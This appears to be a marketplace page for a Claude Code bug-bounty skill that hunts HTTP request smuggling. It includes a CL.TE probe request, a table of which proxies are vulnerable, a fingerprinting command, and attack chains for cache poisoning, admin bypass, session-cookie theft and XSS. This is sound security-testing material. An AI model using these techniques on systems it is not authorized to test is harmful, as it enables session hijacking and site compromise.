Stats
Actions
Tags
From claude-bughunter
Hunts HTTP request smuggling (CL.TE, TE.CL, H2.CL, H2.TE) with detection, timing confirmation, and impact chains (cache poisoning, credential theft, auth bypass). Includes target-suitability matrix for modern proxies.
How this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:hunt-http-smugglingThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
> Lowest dup rate. $5K–$30K. PortSwigger research by James Kettle.
Lowest dup rate. $5K–$30K. PortSwigger research by James Kettle.
POST / HTTP/1.1
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
1. Burp extension: HTTP Request Smuggler
2. Right-click request → Extensions → HTTP Request Smuggler → Smuggle probe
3. Manual timing: CL.TE probe + ~10s delay = backend waiting for rest of body
Poison next request → access admin as victim
Steal credentials → capture victim's session
Cache poisoning → stored XSS at scale
The classic CL.TE / TE.CL payloads are NOT universally exploitable in 2026. Modern proxies are RFC 9112 strict by default. Fingerprint the front-end BEFORE investing time.
| Front-end | CL.TE | TE.CL | H2.CL | H2.TE | Notes |
|---|---|---|---|---|---|
| Nginx ≥ 1.21 | NO | NO | partial (H2 ingress) | partial | RFC-strict; rejects CL+TE with HTTP 400. Verified locally on Nginx 1.27 — all 9 documented variants killed by front-end (docs/verification/phase2h-smuggling-cachepoison.md). |
| Caddy 2.x | NO | NO | — | — | Hardened by default |
| Envoy ≥ 1.20 | NO | NO | partial | partial | Hardened in most paths |
| HAProxy ≤ 2.4 | ✓ | ✓ | — | — | Vulnerable, see CVE-2021-40346 |
| AWS ALB + specific upstream | partial | partial | ✓ | ✓ | Several disclosed-paid reports 2022-2024 |
| Cloudflare → S3 / Lambda chains | — | — | ✓ | ✓ | H2-downgrade attacks remain viable |
| Older F5 BIG-IP (TMM < 16) | ✓ | — | — | — | Vendor advisories |
| Citrix ADC / NetScaler (older firmware) | ✓ | ✓ | — | — | Disclosed in 2020-2022 |
| Squid 3.x | ✓ | — | — | — | Older deployments |
| Apache Traffic Server (older) | ✓ | ✓ | ✓ | ✓ | PortSwigger research |
| Custom Python / Go proxies | ✓ | ✓ | — | — | Frequently miss RFC enforcement |
curl -sI https://target/ | grep -i "Server:"
nginx/1.21+, Caddy, envoy → CL/TE classic is dead — pivot to H2.CL/H2.TE if the front-end speaks HTTP/2, or look for legacy proxies upstreamHAProxy, header points to AWS/CDN → run the full payload matrixspace-before-colon probe; if it doesn't 400, dig deeperH2-downgrade smuggling attacks rely on the front-end speaking HTTP/2 to the client and HTTP/1.1 to origin. The downgrade introduces CL/TE confusion because HTTP/2's frame-length headers don't survive the conversion cleanly. Most CDN+origin chains in 2024-2026 use this exact topology.
Tools that send HTTP/2 raw frames (Burp Pro's HTTP Request Smuggler extension, h2csmuggler, smuggler.py) are the right starting point against CDN-fronted targets. Avoid HTTP/1.1-only test clients (curl, raw sockets) against H2-front-ended targets — you'll send the wrong protocol entirely.
hunt-cache-poison — Smuggling + cache is the canonical critical chain; one smuggled request becomes the cached response for every subsequent victim. Chain primitive: CL.TE smuggle a request whose response body contains attacker HTML/JS → front-end cache stores it under a popular URL (/, /login) → de-sync poisoning where the smuggled request becomes the cached response for the next N victims, persisting for the cache TTL.hunt-auth-bypass — Smuggling reaches internal-only routes that the front-end WAF/auth-proxy filters out. Chain primitive: smuggle GET /admin/users HTTP/1.1 past the front-end ACL that blocks external /admin/* → backend processes the smuggled request as if from a trusted internal source → bypass front-end auth by smuggling internal-routed request → admin data in the response queue.hunt-idor — Smuggling attaches the NEXT user's session cookies to an attacker-controlled request path. Chain primitive: smuggle GET /api/me HTTP/1.1 with no cookies → backend pairs it with the next legitimate user's incoming connection cookies → victim's session cookie attached to attacker's smuggled request → attacker reads the response containing victim's PII/tokens.hunt-xss — Smuggling injects XSS payloads into the response stream of the next victim without ever appearing in a URL parameter. Chain primitive: smuggled request body contains reflected payload that the backend renders into the next response in the queue → next visitor to / receives attacker HTML inline → reflected XSS at every visitor without any URL parameter visible to them or to logs.security-arsenal — Reach for the smuggling payload bank (CL.TE / TE.CL / TE.TE obfuscations, H2.CL downgrade probes, h2csmuggler one-liners, Burp HTTP Request Smuggler extension config) and the time-delay confirmation template before manual hex-editing.triage-validation — Run the Pre-Severity Gate before claiming Critical: the smuggled-request effect MUST land on a request issued by a different client/session, not your own follow-up. A timing delta in your own browser alone is parser disagreement, not exploitable smuggling.npx claudepluginhub elementalsouls/claude-bughunterHTTP request smuggling checklist covering CL.TE, TE.CL, TE.TE variants, timing/differential detection, WAF bypass, cache poisoning, credential hijacking, and HTTP/2 smuggling. Use when testing reverse proxy or load balancer configurations.
Detects and exploits HTTP request smuggling vulnerabilities caused by Content-Length and Transfer-Encoding parsing discrepancies between front-end and back-end servers. For authorized penetration tests against multi-tier web architectures.
Detects and exploits HTTP request smuggling vulnerabilities from Content-Length/Transfer-Encoding parsing discrepancies between front-end and back-end servers. For authorized pentests of proxied web apps using Burp Suite, curl, and smuggler.py.